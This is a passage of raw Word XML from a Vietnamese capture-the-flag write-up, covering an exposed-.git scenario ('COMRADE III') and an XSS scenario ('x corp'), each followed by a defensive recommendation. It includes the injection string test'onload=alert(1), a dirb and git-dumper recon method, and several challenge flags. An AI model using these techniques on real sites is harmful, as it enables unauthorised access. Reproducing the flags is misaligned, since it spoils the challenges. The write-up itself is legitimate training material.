                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F3E856" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta thử </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63251B09"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2D65FFF8" wp14:editId="3D199E51">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="218B197D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Flag: W3lcome_Ag3nt8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D957E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: Lọc đầu vào gói tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513CEEBF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299FE57D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_heading=h.91nv6xcpndhb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản COMRADE III</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633A68D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>COMRADE III - data, information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36896DA1" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện tải file thông qua git-dumper để có được thông tin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F7D73"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0BBC74F4" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên ta sẽ thực hiện vào trang thì không có gì đặc biệt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF75C1"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1ADB5F5F" wp14:editId="6CE68019">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B54109" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo ta sử dụng dirb để thực hiện kiểm tra các domain thì ta thấy được </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8CBA87"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61CD2EF3" wp14:editId="178F0176">
            <wp:extent cx="6114105" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="2209800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DCB917" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta thấy được có </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trường .git</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nên ta sẽ thực hiện tải file về và khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B57E7F"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6437D5E5" wp14:editId="4D159DB7">
            <wp:extent cx="6114105" cy="3949700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3949700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C2B17E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ta cat các file ra xem thì có một thông tin là this_is_top_secret chuyển bin2hex xong gửi lên để truy cập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22200312"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5150420E" wp14:editId="0F03055B">
            <wp:extent cx="6114105" cy="5194300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="5194300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41228A47" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651F9D3B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Với thông tin đó ta sẽ generate api để truyền vào </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trang</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="08DFDFAA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F944092"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01F1279D" wp14:editId="1B896451">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="457DE347" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId95">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.w3schools.com/php/phptryit.asp?filename=tryphp_func_string_bin2hex</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0984E427" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta có được api </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>là  746869735</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>f69735f746f705f736563726574</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3158FA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thực hiện truyền vào trang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F3A1F"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00DA2656" wp14:editId="4BFD707B">
            <wp:extent cx="6114105" cy="3441700"/>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6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D5A628" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Reload lại thì ta có được </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="47541FC7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0153E792"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54D10436" wp14:editId="719B75A3">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE76A17" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Flag{g!7_!5_4w350m3_XD!!}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADDA19C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khuyến cáo: Chặn các trang tải từ git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538DDE49" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04957B74" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_heading=h.co6e0iw86g0m" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản x corp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADB7F3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>x corp - information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2476E8EE" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện truyền payload alert để xem trang hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D2AB7C"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2D09704A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên ta vào trang và nhập thử bất kỳ thì ta chẳng thấy có gì thay đổi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E25A238"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73FCEF3D" wp14:editId="4972EF45">
            <wp:extent cx="6114105" cy="1587500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="1587500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD33CB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta kiểm tra source page thì thấy được rằng là ta có thể truyền payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vào</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F48D50E"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59520A7F" wp14:editId="3B69A193">
            <wp:extent cx="6114105" cy="1625600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1625600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1822398E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">vậy ta sẽ thử truyền payload như sau vào khung inbox </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>test‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>onload=alert(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7406AA4A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>với test’ để đóng câu trước đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBFD171" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>và onload=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1) để bật bảng thông báo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD2BFEE" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cuối cùng ta có flag như bên dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3319EC2C"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5E684C68" wp14:editId="624820F9">
            <wp:extent cx="6114105" cy="1930400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="1930400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04861E3E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
